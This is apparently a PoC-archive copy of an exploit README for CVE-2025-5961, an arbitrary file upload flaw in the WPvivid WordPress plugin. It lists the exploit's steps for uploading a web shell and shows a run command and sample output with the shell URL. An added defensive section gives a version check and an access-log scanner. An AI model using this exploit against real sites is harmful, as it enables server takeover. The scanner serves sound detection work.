Associated vulnerability
Description
Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Authenticated (Administrator+) Arbitrary File Upload
Introduction
# 🚨 Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Authenticated (Administrator+) Arbitrary File Upload
> 📈 *This vulnerability affects a plugin with over **700,000** installs*
---
## 📝 CVE Details
- **CVE:** CVE-2025-5961
- **CVSS:** 7.2 (High)
- **Published:** July 3, 2025
---
## 🔍 Description
The **Migration, Backup, Staging – WPvivid Backup & Migration** plugin for WordPress is vulnerable to **arbitrary file uploads** due to missing file type validation in the `wpvivid_upload_import_files` function in all versions up to, and including, `0.9.116`.
This allows **authenticated attackers (Administrator-level and above)** to upload arbitrary files to the server, potentially enabling remote code execution.
---
## 🧰 Script
This repository contains an exploit script for **CVE-2025-5961**, written in Python, which:
- Checks plugin version.
- Logs in as Administrator.
- Extracts the required nonce from the plugin page.
- Uploads a web shell payload.
- Prints the URL to access the shell.
---
## 🖥️ Example Usage
```bash
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123
```
---
## ⚙️ Usage
```text
$ python3 CVE-2025-5961.py -h
usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL
  -un, --username USERNAME
                        Admin username
  -p, --password PASSWORD
```
---
## 📊 Output Example
```text
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/
```
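From a defender's side, the two facts worth acting on in the output above are the vulnerable version range (`<= 0.9.116`) and the location where uploaded files land (`wp-content/wpvividbackups/ImportandExport/`). The following is an added example, not part of this repository or of the WPvivid plugin: it triages an installed plugin version against the affected range and scans web-server access logs for PHP files being requested from that upload directory. The log lines are constructed samples in combined log format, and the path fragment is taken from the shell URL shown in the README output.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Jul/2025:10:01:02 +0000] "GET /wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.7 - - [03/Jul/2025:10:02:11 +0000] "POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
192.0.2.9 - - [03/Jul/2025:10:03:44 +0000] "GET /wordpress/wp-content/wpvividbackups/ImportandExport/backup.zip HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Upload directory taken from the README's shell URL; compared case-insensitively
# because the web server may or may not treat paths case-sensitively.
UPLOAD_DIR = "/wp-content/wpvividbackups/importandexport/"

# Last affected version according to the advisory on this page.
LAST_VULNERABLE = (0, 9, 116)


def is_vulnerable_version(version: str) -> bool:
    """True if a WPvivid version string falls in the affected range (<= 0.9.116)."""
    parts = tuple(int(x) for x in re.findall(r"\d+", version))
    return parts <= LAST_VULNERABLE


def is_suspicious(target: str) -> bool:
    """True if the request targets a PHP file inside WPvivid's import/export directory.

    Legitimate backup archives live there too, so only executable extensions are flagged.
    """
    path = urlparse(target).path.lower()
    return UPLOAD_DIR in path and path.endswith(".php")


def scan(log_text: str) -> list:
    """Return one finding per log line that requests PHP from the upload directory."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        if not is_suspicious(m["target"]):
            continue
        findings.append({
            "ip": m["ip"],
            "time": m["ts"],
            "method": m["method"],
            "path": urlparse(m["target"]).path,
            "query": parse_qs(urlparse(m["target"]).query),
            "status": int(m["status"]),
        })
    return findings


if __name__ == "__main__":
    print("0.9.116 vulnerable:", is_vulnerable_version("0.9.116"))
    print("0.9.117 vulnerable:", is_vulnerable_version("0.9.117"))
    for f in scan(SAMPLE_LOG):
        print(f"[!] {f['time']} {f['ip']} {f['method']} {f['path']} "
              f"query={f['query']} status={f['status']}")
```

The scanner deliberately ignores non-PHP objects in the same directory, since WPvivid stores legitimate backup archives there; a PHP file under that path, or any 200 response to it, is the signal worth alerting on. Pair it with the version check: an installation on 0.9.116 or earlier should be updated, and its `ImportandExport` directory reviewed for files the plugin did not create.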
---
## ⚖️ Disclaimer
This script is provided for **educational and research purposes only**.
The author is not responsible for any misuse or damage caused by this tool.
---
## ✍️ By
**Khaled Alenazi (Nxploited)**
🌐 [GitHub](https://github.com/Nxploited/)
---
File snapshot
[4.0K] /data/pocs/446db3a8f55426a0861b02d12cf80a51caba1abf
├── [3.5K] CVE-2025-5961.py
├── [1.1K] LICENSE
├── [2.3K] README.md
└── [ 9] requirements.txt
0 directories, 4 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source has gone offline or cannot be reached, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.